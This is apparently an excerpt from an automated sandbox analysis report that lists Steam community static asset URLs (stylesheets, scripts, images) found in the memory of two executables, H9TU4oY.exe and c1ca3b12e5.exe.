Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626791918.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalCont&
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&g
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/cs
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
